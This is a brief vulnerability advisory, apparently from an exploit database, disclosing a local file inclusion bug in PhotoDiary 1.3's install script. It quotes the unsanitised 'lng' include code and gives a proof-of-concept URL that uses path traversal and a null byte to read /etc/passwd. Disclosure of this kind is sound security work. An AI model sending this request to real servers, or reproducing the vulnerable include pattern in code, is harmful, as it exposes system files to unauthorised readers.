PhotoDiary 1.3 (lng) Local File Inclusion Vulnerability Discovered by cOndemned download: http://code.google.com/p/photodiary/ source of /admin/install.php (lines 9 - 15): if (isset($_GET['lng'])){ $LNG = $_GET['lng']; # 1 } else { $LNG = "ITA"; } include "../common/language_".$LNG.".php"; # 2 proof of concept: http://[target_host]/admin/install.php?lng=/../../../../../../etc/passwd%00
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论